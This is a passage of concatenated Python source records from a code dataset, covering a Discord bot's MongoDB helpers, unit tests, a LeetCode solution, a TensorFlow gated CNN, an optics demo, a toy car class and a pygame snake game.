import datetime, timedelta\nimport os\n\n\nmongodb_credentials = os.getenv('mongodb')\ncluster = MongoClient(mongodb_credentials)\ndb = cluster[\"Real_Esports_Bot\"]\ncollection = db[\"countr\"]\n\n# Returns a colour with a set chance \ndef randomc():\n chance = random.randint(0, 100) \n if chance <= 10:\n randomcolour = 0x800080 #purple\n return randomcolour\n elif chance <= 20:\n randomcolour = 0xFFFF00 #yellow\n return randomcolour\n elif chance <= 30:\n randomcolour = 0x00FFFF #cyan\n return randomcolour\n elif chance <= 40:\n randomcolour = 0xFF0000 #red\n return randomcolour\n elif chance <= 50:\n randomcolour = 0xFFFFFF # white\n return randomcolour\n else:\n randomcolour = 0x00FF00 #green\n return randomcolour\n\n# send team names with user to the channel\nasync def update_confirm_teams(ctx, user, *arg1):\n query = {\"_id\" : \"teamcounter\"}\n doc = collection.find(query)\n for result in doc:\n score = result[\"counter\"]\n score = score + 1\n collection.update_one({\"_id\": \"teamcounter\"},{\"$set\": {\"counter\": score}},)\n return score\n\n# returns random emote\ndef randomemote():\n opemotes = [\" \",\n \" \",\n \" \",\n \"<:ATD_vortexScam:801698916373495819> \",\n \" \",\n \" \",\n \" \",\n \"\",\n \" \",\n \" \" ]\n random_emote = random.choice(opemotes)\n return random_emote\n\ndef addnewuserinfraction(message):\n# ----------------------------------------\n mongodb_credentials = os.getenv('mongodb')\n cluster = MongoClient(mongodb_credentials)\n db = cluster[\"Real_Esports_Bot\"]\n collection = db[\"watcher_bot_v2\"]\n# ----------------------------------------\n \n \n post = {\n \"_id\": message.author.id,\n \"rajumentions\": 1,\n \"name\": message.author.name,\n \"time\": datetime.now()\n }\n collection.insert_one(post)\n\ndef adduserinfraction(message):\n# ----------------------------------------\n mongodb_credentials = os.getenv('mongodb')\n cluster = MongoClient(mongodb_credentials)\n db = cluster[\"Real_Esports_Bot\"]\n collection = db[\"watcher_bot_v2\"]\n# ----------------------------------------\n\n query = {\"_id\": message.author.id}\n user = collection.find(query)\n for result in user:\n score = result[\"rajumentions\"]\n score = score + 1\n collection.update_one(\n {\"_id\": message.author.id},\n {\"$set\": {\n \"rajumentions\": score\n }},\n )\n collection.update_one(query,\n {\"$set\": {\n \"time\": datetime.now()\n }})\n\n \n\n\n\n\n\n\n ","sub_path":"cmds/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"617800924","text":"import unittest\nfrom fibonacci import fib\nclass FibonacciTestSuite(unittest.TestCase):\n\t\n\tdef test_fibonacci(self):\n\t\tcases=[(0, 0), (1, 1), (2, 1), (3, 2), (4, 3)]\n\t\tfor i in range(0, len(cases)):\n\t\t\tself.assertEqual( cases[i][1], fib(cases[i][0]) )\t\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"fibonacci/testfibonacci.py","file_name":"testfibonacci.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"132477114","text":"import csv\nimport json\nfrom datetime import date\n\n\ndef export_json(input_csv, name):\n \"\"\"\n Creates json that matches ABR format\n \"\"\"\n e_json = {\n \"name\": name,\n \"date\": date.today().strftime(\"%Y-%m-%d\"),\n \"cutToTop\": 0,\n \"preliminaryRounds\": 0,\n \"tournamentOrganiser\": {\"nrdbId\": \"\", \"nrdbUsername\": \"YsengrinSC\"},\n \"players\": 
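The fibonacci test above loops over cases by index, so a failing run stops at the first bad case. A sketch of the same table-driven test using unittest's subTest, which reports every failing case separately; fib is stubbed with an iterative implementation here so the snippet runs on its own:

import unittest

def fib(n):
    # stand-in for the module under test, so the sketch is self-contained
    a, b = 0, 1
    for _ in range(n):
        a, b = b, a + b
    return a

class FibonacciTestSuite(unittest.TestCase):
    def test_fibonacci(self):
        for n, expected in [(0, 0), (1, 1), (2, 1), (3, 2), (4, 3)]:
            with self.subTest(n=n):
                self.assertEqual(expected, fib(n))

if __name__ == "__main__":
    unittest.main()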
[],\n \"eliminationPlayers\": {},\n \"uploadedFrom\": \"SASS\",\n \"links\": {\n 0: {\n \"rel\": \"schemaderivedfrom\",\n \"href\": \"http://steffens.org/nrtm/nrtm-schema.json\",\n },\n 1: {\n \"rel\": \"uploadedfrom\",\n \"href\": \"https://github.com/Chemscribbler/Netrunner/tree/main/SingleSided_App\",\n },\n },\n }\n\n with open(input_csv, \"r\", encoding=\"cp1257\") as csvfile:\n reader = csv.DictReader(csvfile)\n count = 0\n for row in reader:\n e_json[\"players\"].append(\n {\n \"id\": count,\n \"name\": row[\"Player\"],\n \"rank\": row[\"Position\"],\n \"corpIdentity\": row[\"Corp\"],\n \"runnerIdentity\": row[\"Runner\"],\n \"matchPoints\": row[\"Score\"],\n \"strengthOfSchedule\": round(float(row[\"SoS\"]), 4),\n \"extendedStrengthOfSchedule\": round(float(row[\"eSoS\"]), 6),\n \"sideBalance\": row[\"SideBalance\"],\n }\n )\n count += 1\n\n return e_json\n\n\nif __name__ == \"__main__\":\n file_name = input(\"File Name: \")\n t_name = input(\"Tournament Name: \")\n with open(\"results.json\", \"w\") as outfile:\n json.dump(export_json(file_name, t_name), outfile)\n\n","sub_path":"app/util/csv_to_json.py","file_name":"csv_to_json.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"134990228","text":"# -- coding = 'utf-8' -- \n# Author Kylin\n# Python Version 3.7.3\n# OS macOS\n\"\"\"\nNo. 360 有序转化数组\n需求:\n 给你一个已经排好序的整数数组nums和整数a、b、c。\n 对于数组中的每一个元素nums[i] ,计算函数值f(x) = ax^2 + bx + c ,请按升序返回数组。\n\n\"\"\"\n\n\ndef sortTransformedArray_map(nums, a, b, c):\n \"\"\"\n 利用map直接计算相关元素的函数值,然后对结果进行排序\n 时间复杂度:O(nlogn),用于排序\n 空间复杂度:O(1)\n :type nums: List[int]\n :type a: int\n :type b: int\n :type c: int\n :rtype: List[int]\n \"\"\"\n\n def calculate(x):\n return a * x**2 + b * x + c\n\n res_list = list(map(calculate, nums))\n\n res_list.sort()\n\n return res_list\n\n\ndef sortTransformedArray_math(nums, a, b, c):\n \"\"\"\n 基于一元二次函数的性质\n 不使用排序,使用双指针,优化时间复杂度\n 时间复杂度:O(n)\n 空间复杂度:O(1)\n :param nums:\n :param a:\n :param b:\n :param c:\n :return:\n \"\"\"\n def calculate(x):\n return a * (x**2) + b * x + c\n\n n = len(nums)\n res_list = [0 for _ in range(n)]\n\n # 如果a == 0,函数f(x)退化为线性函数bx+c\n if a == 0:\n res_index = 0\n if b >= 0:\n for i in range(n):\n res_list[res_index] = calculate(nums[i])\n res_index += 1\n\n else:\n for i in range(n-1, -1, -1):\n res_list[res_index] = calculate(nums[i])\n res_index += 1\n else:\n # 否则,f(x)是二次函数,在在x=-b/2a取得极值\n diad = - (b / (2.0 * a))\n left, right = 0, n - 1\n if a > 0:\n # 如果 a > 0, f(x)是一个凹函数,在x=-b/2a取得最小值\n res_index = n - 1\n while left < right:\n if abs(nums[left] - diad) > abs(nums[right] - diad):\n res_list[res_index] = calculate(nums[left])\n left += 1\n\n else:\n res_list[res_index] = calculate(nums[right])\n right -= 1\n res_index -= 1\n # 记得加上最后一个元素,也就是left == right时\n res_list[res_index] = calculate(nums[left])\n else:\n # 如果 a < 0, f(x)是一个凹函数,在x=-b/2a取得最大值\n res_index = 0\n while left < right:\n if abs(nums[left] - diad) >= abs(nums[right] - diad):\n res_list[res_index] = calculate(nums[left])\n left += 1\n else:\n res_list[res_index] = calculate(nums[right])\n right -= 1\n res_index += 1\n # 记得加上最后一个元素,也就是left == right时\n res_list[res_index] = calculate(nums[left])\n\n return res_list\n\n\nif __name__ == \"__main__\":\n nums = [-4, -2, 2, 4]\n a, b, c = -1, 3, 5\n sort_res = sortTransformedArray_math(nums, a, b, c)\n 
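The LeetCode 360 record above gives both an O(n log n) map-and-sort solution and an O(n) two-pointer one. A compact cross-check of the two ideas — these are re-implementations written for a self-contained harness, not the record's functions verbatim:

import random

def baseline(nums, a, b, c):
    return sorted(a * x * x + b * x + c for x in nums)

def two_pointer(nums, a, b, c):
    def f(x):
        return a * x * x + b * x + c
    n = len(nums)
    res = [0] * n
    lo, hi = 0, n - 1
    idx, step = (n - 1, -1) if a >= 0 else (0, 1)
    while lo <= hi:
        left, right = f(nums[lo]), f(nums[hi])
        # convex (a >= 0): the extremes hold the max, so fill from the back;
        # concave (a < 0): the extremes hold the min, so fill from the front
        take_left = left >= right if a >= 0 else left <= right
        if take_left:
            res[idx] = left
            lo += 1
        else:
            res[idx] = right
            hi -= 1
        idx += step
    return res

for _ in range(200):
    nums = sorted(random.sample(range(-50, 50), random.randint(1, 20)))
    a, b, c = (random.randint(-5, 5) for _ in range(3))
    assert two_pointer(nums, a, b, c) == baseline(nums, a, b, c)
print("two-pointer output matches the sort baseline")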
print(sort_res)\n","sub_path":"LeetCode/src/calculate08/sort_transformed_array.py","file_name":"sort_transformed_array.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"553322793","text":"import tensorflow as tf\nimport numpy as np\n\n\nclass GatedCNN_nopadding(object):\n \"\"\"\n Uses an embedding layer, followed by a convolutional,gated, and softmax layer.\n \"\"\"\n def __init__(\n self, sequence_length, num_classes, vocab_size,\n embedding_size, filter_sizes, num_filters, l2_reg_lambda,learning_rate):\n\n # Placeholders for input, output and dropout\n self.input_x = tf.placeholder(tf.int32, [None, sequence_length], name=\"input_x\")\n self.input_y = tf.placeholder(tf.float32, [None, num_classes], name=\"input_y\")\n self.dropout_keep_prob = tf.placeholder(tf.float32, name=\"dropout_keep_prob\")\n\n # Keeping track of l2 regularization loss (optional)\n l2_loss = tf.constant(0.0)\n\n\n\n # Embedding layer\n with tf.device('/cpu:0'), tf.name_scope(\"embedding\"):\n self.W = tf.Variable(\n tf.random_uniform([vocab_size, embedding_size], -0.25, 0.25),trainable=True,\n name=\"W\")\n self.embedded_chars = tf.nn.embedding_lookup(self.W, self.input_x)\n\n\n self.embedded_chars_expanded = tf.expand_dims(self.embedded_chars, -1)\n\n # Create a convolution + maxpool layer for each filter size\n\n filter_size = filter_sizes[0]\n with tf.name_scope(\"conv-maxpool-%s\" % filter_size):\n # Convolution Layer\n filter_shape = [filter_size, embedding_size, 1, num_filters]\n W1 = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name=\"W1\")\n b1 = tf.Variable(tf.constant(0.1, shape=[num_filters]), name=\"b1\")\n conv = tf.nn.conv2d(\n self.embedded_chars_expanded,\n W1,\n strides=[1, 1, 1, 1],\n padding=\"VALID\",\n name=\"conv\")\n\n h1 = tf.add(conv, b1)\n\n W2 = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name=\"W2\")\n b2 = tf.Variable(tf.constant(0.1, shape=[num_filters]), name=\"b2\")\n conv = tf.nn.conv2d(\n self.embedded_chars_expanded,\n W2,\n strides=[1, 1, 1, 1],\n padding=\"VALID\",\n name=\"conv\")\n h2 = tf.add(conv, b2)\n\n #add forget gate\n h = h1 * tf.sigmoid(h2)\n print (h.shape)\n h = tf.reshape(h, (-1, (num_filters * (sequence_length - filter_size + 1))))\n print (h.shape)\n\n\n\n # Add dropout\n with tf.name_scope(\"dropout\"):\n self.h_drop = tf.nn.dropout(h, self.dropout_keep_prob)\n\n # Final (unnormalized) scores and predictions\n with tf.name_scope(\"output\"):\n W = tf.get_variable(\n \"W\",\n shape=[h.get_shape()[1], num_classes],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.Variable(tf.constant(0.1, shape=[num_classes]), name=\"b\")\n l2_loss += tf.nn.l2_loss(W)\n l2_loss += tf.nn.l2_loss(b)\n self.scores = tf.nn.xw_plus_b(self.h_drop, W, b, name=\"scores\")\n self.predictions = tf.argmax(self.scores, 1, name=\"predictions\")\n\n # CalculateMean cross-entropy loss\n with tf.name_scope(\"loss\"):\n losses = tf.nn.softmax_cross_entropy_with_logits(logits=self.scores, labels=self.input_y)\n self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss\n # optimizer = tf.train.AdamOptimizer(learning_rate)\n # grads_and_vars = optimizer.compute_gradients(self.loss)\n # self.train_op = optimizer.apply_gradients(grads_and_vars)\n\n\n # Accuracy\n with tf.name_scope(\"accuracy\"):\n correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, \"float\"), 
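The gated layer in the record above computes h = conv1(x) * sigmoid(conv2(x)), i.e. a gated linear unit. A numpy-only sketch of just that gating step on a 1-D sequence, with toy shapes chosen purely for illustration:

import numpy as np

rng = np.random.default_rng(0)
seq_len, emb, n_filters, width = 10, 8, 4, 3

x = rng.standard_normal((seq_len, emb))
W1 = rng.standard_normal((width, emb, n_filters)) * 0.1
W2 = rng.standard_normal((width, emb, n_filters)) * 0.1

def conv1d_valid(x, W):
    # "VALID" convolution: output length = seq_len - width + 1
    out_len = x.shape[0] - W.shape[0] + 1
    return np.stack([np.einsum("we,wef->f", x[t:t + W.shape[0]], W)
                     for t in range(out_len)])

h1 = conv1d_valid(x, W1)                  # linear path
h2 = conv1d_valid(x, W2)                  # gate path
h = h1 * (1.0 / (1.0 + np.exp(-h2)))      # elementwise sigmoid gating
print(h.shape)  # (seq_len - width + 1, n_filters)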
name=\"accuracy\")\n self.y = tf.argmax(self.input_y, 1)\n\n\n\n","sub_path":"gated_cnn_nopadding.py","file_name":"gated_cnn_nopadding.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"294651348","text":"\"\"\"\nTest script for testing the AiryBeam1D command.\n\"\"\"\n\nfrom LightPipes import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nwavelength = 2.3*um\nsize = 30*mm\nN = 500\nN2=N//2\nx0=0.3*mm\na=0.1/mm\ndz=1.25*cm\nNZ=200\nw=0.5*mm\n\nF0=Begin(size,wavelength,N)\nF0=AiryBeam1D(F0,x0=x0, a=a)\nIx=np.zeros(N)\nfor k in range(0,NZ):\n if k==10:\n F0=CircScreen(F0,w,x_shift=-1*mm)\n F=Forvard(F0,dz*k)\n I=Intensity(F)\n Ix=np.vstack([Ix,I[N2]])\n\nplt.figure(figsize = (12,5))\nplt.imshow(Ix,\n extent=[-size/2/mm, size/2/mm, 0, NZ*dz/cm],\n aspect=0.08,\n origin='lower',\n cmap='jet',\n )\nplt.title('1D Airy beam')\nplt.xlabel('x [mm]')\nplt.ylabel('z [cm]')\ns = r'LightPipes for Python' + '\\n'+ '1D Airy beam' + '\\n\\n'\\\n r'$\\lambda = {:4.2f}$'.format(wavelength/um) + r' ${\\mu}m$' + '\\n'\\\n r'$size = {:4.2f}$'.format(size/mm) + r' $mm$' + '\\n'\\\n r'$N = {:4d}$'.format(N) + '\\n'\\\n r'$x_0 = {:4.2f}$'.format(x0/mm) + r' $mm$' + '\\n'\\\n r'$a = $' + '{:4.2f}'.format(a*mm) + r' $/mm$' + '\\n'\\\n r'${\\copyright}$ Fred van Goor, May 2022'\nplt.text(16, 50, s, bbox={'facecolor': 'white', 'pad': 5})\nplt.show()\n","sub_path":"docs/plot_directive/Examples/Commands/AiryBeam1D.py","file_name":"AiryBeam1D.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"90784738","text":"import re\n\nimport pytest\n\nfrom storyscript.resolver import Resolver\n\n\n@pytest.mark.parametrize('path,data,result', [\n (['a', 'b', 'c'], {'a': {'b': {'c': 1}}}, 1),\n (['a'], {'a': {'b': {}}}, {'b': {}}),\n (['a', '1', 'b'], {'a': [None, {'b': 1}]}, 1)\n])\ndef test_resolve_path(path, data, result):\n assert Resolver.path(path, data) == result\n\n\ndef test_resolve_path_undefined():\n assert Resolver.path('a.b', {}) is None\n\n\n@pytest.mark.parametrize('obj,data,result', [\n ({'$OBJECT': 'path', 'paths': ['a']}, {'a': 1}, 1),\n ({'$OBJECT': 'value', 'value': 'a'}, None, 'a'),\n ({'$OBJECT': 'value', 'value': 1}, None, 1),\n ({'$OBJECT': 'expression',\n 'expression': '{} == 1',\n 'values': [{'$OBJECT': 'path', 'paths': ['a']}]}, {'a': 1}, True),\n ({'$OBJECT': 'expression',\n 'expression': '{} > {}',\n 'values': [{'$OBJECT': 'path', 'paths': ['a']},\n {'$OBJECT': 'value', 'value': 2}]},\n {'a': 1}, False),\n ({'$OBJECT': 'method',\n 'method': 'is',\n 'left': {'$OBJECT': 'value', 'value': 1},\n 'right': {'$OBJECT': 'path', 'paths': ['a']}},\n {'a': 1}, 1),\n (1, None, 1),\n (None, None, None),\n ('string', None, 'string'),\n ({'a': 'b'}, None, {'a': 'b'})\n])\ndef test_resolve_resolve(obj, data, result):\n assert Resolver.resolve(obj, data) == result\n\n\ndef test_resolve_obj_regexp():\n result = Resolver.object({'$OBJECT': 'regexp', 'regexp': 'abc'}, None)\n assert result.pattern == 'abc'\n\n\n@pytest.mark.parametrize('method, left, right, result', [\n ('like', 'abc', re.compile('^abc'), True),\n ('has', {'b': 1}, 'b', True),\n ('contains', {'b': 1}, 'b', True),\n ('contains', {}, 'c', False),\n ('has', ['b'], 'b', True),\n ('in', 'b', ['b'], True),\n ('excludes', 1, [0], True),\n ('contains', ['b'], 'b', True),\n ('isnt', 1, 1, False),\n ('is', 1, 1, True),\n])\ndef test_resolve_method(method, left, 
right, result):\n assert Resolver.method(method, left, right) == result\n\n\n@pytest.mark.parametrize('items_list, data, result', [\n ([{'$OBJECT': 'path', 'paths': ['a']}], {'a': 1}, [1]),\n ([{'$OBJECT': 'path', 'paths': ['a']}], {}, [None]),\n ([], None, []),\n ([{'$OBJECT': 'path', 'paths': ['abc']},\n {'$OBJECT': 'value', 'value': 1}],\n {'abc': 0, 'b': 1}, [0, 1]),\n])\ndef test_resolve_list(items_list, data, result):\n assert Resolver.values(items_list, data=data) == result\n\n\n@pytest.mark.parametrize('dictionary, data, result', [\n ({'k': {'$OBJECT': 'path', 'paths': ['a']}}, {'a': 1}, {'k': 1}),\n ({'k': {'$OBJECT': 'path', 'paths': ['a']}}, {}, {'k': None}),\n ({}, None, {}),\n ({'a': {'$OBJECT': 'path', 'paths': ['abc']},\n 'b': {'$OBJECT': 'value', 'value': 1}},\n {'abc': 0, 'b': 1}, {'a': 0, 'b': 1}),\n])\ndef test_resolve_dict(dictionary, data, result):\n assert Resolver.dictionary(dictionary, data) == result\n\n\n@pytest.mark.parametrize('value,result', [\n (1, '1'),\n ('a', '\"\"\"a\"\"\"'),\n ('a\"', '\"\"\"a\\\"\"\"\"'),\n])\ndef test_stringify(value, result):\n assert Resolver.stringify(value) == result\n","sub_path":"tests/integration/test_resolver.py","file_name":"test_resolver.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"136832103","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 3 23:03:59 2019\r\n\r\n@author: alessandrocravioglio\r\n\"\"\"\r\n\r\nclass Auto(object):\r\n def __init__(self, color):\r\n self._color = color\r\n \r\n def set_color(self, newcolor):\r\n self._color = newcolor\r\n \r\n def get_color(self):\r\n return \"The car is \"+self._color+\".\"\r\n \r\n def enter_auto(self, enter_auto):\r\n if self._door_status:\r\n if enter_auto == \"in\":\r\n self._enter_auto = True\r\n elif enter_auto == \"out\":\r\n self._enter_auto = False\r\n else:\r\n raise ValueError(\"You can only go in and co out of your car\")\r\n self._enter_auto = False\r\n else:\r\n return \"The doors are closed, you can't enter\"\r\n \r\n def get_driver_in(self): #TODO: integration with the rest of the methods\r\n if self._enter_auto == True:\r\n return \"You are ready to start, but first do all the occurrences.\"\r\n else:\r\n self._enter_auto == False\r\n return \"you are out of the car.\"\r\n \r\n def set_motor_status(self, motor_status):\r\n if self._enter_auto: \r\n if motor_status == \"turn on\":\r\n self._motor_status = True\r\n elif motor_status == \"turn off\":\r\n self._motor_status = False\r\n else:\r\n raise ValueError(\"You can only turn off or turn down the motor\")\r\n self._motor_status = False\r\n elif self._door_status:\r\n return \"The doors are open\"\r\n else:\r\n return \"You are out of the car\"\r\n \r\n def get_motor_status(self):\r\n if self._motor_status:\r\n return \"The motor is on.\"\r\n else:\r\n return \"The motor is off.\"\r\n \r\n def set_door_status(self, door_status):\r\n if door_status == \"open doors\":\r\n self._door_status = True\r\n elif door_status == \"close doors\":\r\n self._door_status = False\r\n else:\r\n raise ValueError(\"you can only close and open the doors\")\r\n \r\n def get_door_status(self):\r\n if self._door_status:\r\n return \"The doors are open\"\r\n else:\r\n return \"The doors are closed\"\r\n \r\n def set_speed(self, speed):\r\n self._speed = speed\r\n \r\n def get_speed(self):\r\n return self._speed\r\n \r\n def get_car_status(self):\r\n return Auto.get_door_status(self),Auto.get_driver_in(self) , 
Auto.get_motor_status(self), Auto.get_color(self) #Auto.get_speed(self)\r\n \r\n \r\n \r\n# IMPORTANT: spped is not well implemented\r\n# to make this Auto function you have to follow theese steps:\r\n# 1. open the doors ==> set_door_status(\"open doors\")\r\n# 2. enter in the auto ==> enter_auto(\"in\")\r\n# 3. turn on the motor == set_motor_status(\"turn on\") \r\n# if you want to see the car status, you have to call the method get_car_status()\r\n# PROBLEM: you have to assign the attributes, or the program will print an AttributeError\r\n\r\n\"\"\" \r\nto implement when the Auto is functioning well\r\n \r\nclass Position(object):\r\n pass\r\n\r\nclass My_position(Position):\r\n pass\r\n\r\nclass Final_position(Position):\r\n pass\r\n \r\n\"\"\" \r\n\r\n#think about the architecture,only one class or more classes?\r\n#implement position\r\n\r\nmy_car = Auto(\"grey\")\r\nmy_car.set_door_status(\"open doors\")\r\nmy_car.enter_auto(\"in\")\r\nmy_car.set_motor_status(\"turn on\")\r\n\r\nprint(my_car.get_car_status())\r\n\r\n","sub_path":"py-oop-auto.py","file_name":"py-oop-auto.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"280060746","text":"import pygame\nimport random\n\nFRAME_RATE = 10\nFRAME_WIDTH = 500\nFRAME_HEIGHT = 500\nWALL_WIDTH = 5\nSNAKE_SIZE = 20\nFOOD_RAD = 4\n\nclass Snake(object):\n def __init__(self):\n self.x = (FRAME_WIDTH - SNAKE_SIZE)/2 + WALL_WIDTH\n self.y = (FRAME_HEIGHT - SNAKE_SIZE)/2 + WALL_WIDTH\n self.length = 1\n self.x_vel = SNAKE_SIZE\n self.y_vel = 0\n\n self.body = [self.head()]\n\n def head(self):\n return pygame.Rect(self.x, self.y, SNAKE_SIZE, SNAKE_SIZE)\n\n def move_left(self):\n self.x_vel = - SNAKE_SIZE\n self.y_vel = 0\n\n def move_right(self):\n self.x_vel = SNAKE_SIZE\n self.y_vel = 0\n\n def move_up(self):\n self.x_vel = 0\n self.y_vel = -SNAKE_SIZE\n\n def move_down(self):\n self.x_vel = 0\n self.y_vel = SNAKE_SIZE\n\n def increase_size(self):\n self.body.insert(0, pygame.Rect(self.x, self.y, SNAKE_SIZE, SNAKE_SIZE))\n\n def draw(self, win):\n self.x = (self.x + self.x_vel)\n if self.x < WALL_WIDTH or self.x >= FRAME_WIDTH+WALL_WIDTH:\n return False\n self.y = (self.y + self.y_vel)\n if self.y < WALL_WIDTH or self.y >= FRAME_HEIGHT+WALL_WIDTH:\n return False\n for piece in self.body:\n if piece.colliderect(self.head()):\n return False\n self.body.insert(0, self.head())\n self.body.pop()\n drawn = []\n for piece in self.body:\n pygame.draw.rect(win, (0,255,0), piece)\n drawn.append(piece)\n\n return True\n\n def __del__(self):\n pass\n\nclass Food(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.show = False\n\n @classmethod\n def random(cls):\n return Food(random.randint(0, FRAME_WIDTH) // SNAKE_SIZE * SNAKE_SIZE + SNAKE_SIZE//2 + WALL_WIDTH,\n random.randint(0, FRAME_HEIGHT) // SNAKE_SIZE * SNAKE_SIZE + SNAKE_SIZE//2 + WALL_WIDTH)\n\n def check_eat(self, snake):\n return snake.head().collidepoint(self.x, self.y)\n\n def draw(self, win):\n pygame.draw.circle(win, (255,0,0), (self.x, self.y), FOOD_RAD)\n\ndef display_text(win, text, x, y, size, color):\n font = pygame.font.SysFont('comicsansms', size)\n rendering = font.render(text, True, color)\n win.blit(rendering, (x, y))\n\ndef text_size(text, size):\n font = pygame.font.SysFont('comicsansms', size)\n return font.size(text)\n\ndef main():\n # start the window\n win = pygame.display.set_mode((FRAME_WIDTH+WALL_WIDTH*2, FRAME_HEIGHT+WALL_WIDTH*2))\n\n #initial setup\n 
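The Auto class above hand-rolls get_/set_ pairs and, as its own comments concede, leaves attributes unset until the right method happens to run. A sketch of the same idea in more idiomatic Python, with @property accessors and explicit defaults in __init__ (names here are illustrative, not the record's):

class Car:
    def __init__(self, color):
        self.color = color          # goes through the property setter below
        self.doors_open = False     # every state flag gets a default up front
        self.driver_in = False
        self.motor_on = False

    @property
    def color(self):
        return self._color

    @color.setter
    def color(self, value):
        self._color = value

    def start(self):
        if not self.driver_in:
            raise RuntimeError("get in the car first")
        self.motor_on = True

car = Car("grey")
car.doors_open = True
car.driver_in = True
car.start()
print(car.color, car.motor_on)  # grey True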
pygame.display.set_caption('Snakey Snake')\n clock = pygame.time.Clock()\n\n init = pygame.font.init()\n\n # init the snake\n snake = Snake()\n\n # init the current food item\n food = Food.random()\n\n # do the intro sequence\n pygame.draw.lines(win, (255,255,255), True, [(0,0),\n (0,FRAME_HEIGHT+WALL_WIDTH*2),\n (FRAME_WIDTH+WALL_WIDTH*2, FRAME_HEIGHT+WALL_WIDTH*2),\n (FRAME_WIDTH+WALL_WIDTH*2, 0)], 5)\n pygame.draw.rect(win, (255,255,255), (FRAME_WIDTH//2 - 100 + WALL_WIDTH, FRAME_HEIGHT//2 - 50 + WALL_WIDTH,\n 200, 100))\n text_width, text_height = text_size('START', 40)\n display_text(win, 'START', (FRAME_WIDTH-text_width)//2 + WALL_WIDTH, (FRAME_HEIGHT-text_height)//2 + WALL_WIDTH, 40, (0,0,0))\n pygame.display.update()\n wait = True\n while wait:\n clock.tick(FRAME_RATE)\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n wait = False\n\n wait = True\n while wait:\n clock.tick(FRAME_RATE)\n if event.type == pygame.QUIT:\n wait = False\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n snake.move_left()\n elif event.key == pygame.K_RIGHT:\n snake.move_right()\n elif event.key == pygame.K_UP:\n snake.move_up()\n elif event.key == pygame.K_DOWN:\n snake.move_down()\n elif event.key == pygame.K_ESCAPE or event.key == pygame.K_RETURN:\n wait = False\n\n if food.check_eat(snake):\n snake.increase_size()\n del food\n food = Food.random()\n\n win.fill((0,0,0))\n pygame.draw.lines(win, (255,255,255), True, [(0,0),\n (0,FRAME_HEIGHT+WALL_WIDTH*2),\n (FRAME_WIDTH+WALL_WIDTH*2, FRAME_HEIGHT+WALL_WIDTH*2),\n (FRAME_WIDTH+WALL_WIDTH*2, 0)], 5)\n food.draw(win)\n wait = snake.draw(win)\n pygame.display.update()\n\n # do clean up stuff here\n pygame.draw.rect(win, (255,0,0), (FRAME_WIDTH//2 - 100 + WALL_WIDTH, FRAME_HEIGHT//2 - 50 + WALL_WIDTH,\n 200, 100))\n text_width, text_height = text_size('DED', 40)\n display_text(win, 'DED', (FRAME_WIDTH-text_width)//2 + WALL_WIDTH, (FRAME_HEIGHT-text_height)//2 + WALL_WIDTH, 40, (0,0,0))\n pygame.display.update()\n\n wait = True\n while wait:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN and (event.key == pygame.K_RETURN or event.key == pygame.K_ESCAPE):\n wait = False\n return\n\nif __name__ == '__main__':\n main()","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"45911919","text":"from biplist import *\nimport datetime\nimport os\nfrom test_utils import *\nimport unittest\n\nclass TestValidPlistFile(unittest.TestCase):\n def setUp(self):\n pass\n \n def validateSimpleBinaryRoot(self, root):\n self.assertTrue(type(root) == dict, \"Root should be dictionary.\")\n self.assertTrue(type(root[b'dateItem']) == datetime.datetime, \"date should be datetime\")\n self.assertEqual(root[b'dateItem'], datetime.datetime(2010, 8, 19, 22, 27, 30, 385449), \"dates not equal\" )\n self.assertEqual(root[b'numberItem'], -10000000000000000, \"number not of expected value\")\n self.assertEqual(root[b'unicodeItem'], 'abc\\u212cdef\\u2133')\n self.assertEqual(root[b'stringItem'], b'Hi there')\n self.assertEqual(root[b'realItem'], 0.47)\n self.assertEqual(root[b'boolItem'], True)\n self.assertEqual(root[b'arrayItem'], [b'item0'])\n \n def testFileRead(self):\n try:\n result = readPlist(data_path('simple_binary.plist'))\n self.validateSimpleBinaryRoot(result)\n except NotBinaryPlistException as e:\n 
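One quirk in the snake game above: Food.random() can spawn on a cell the snake already occupies. A sketch of a rejection-sampling respawn helper using the same grid arithmetic; in the real game, occupied_cells would be built from the snake's body rectangles:

import random

SNAKE_SIZE, FRAME_WIDTH, FRAME_HEIGHT, WALL_WIDTH = 20, 500, 500, 5

def random_food(occupied_cells):
    # retry until the food lands on a free grid cell
    while True:
        x = random.randint(0, FRAME_WIDTH) // SNAKE_SIZE * SNAKE_SIZE + SNAKE_SIZE // 2 + WALL_WIDTH
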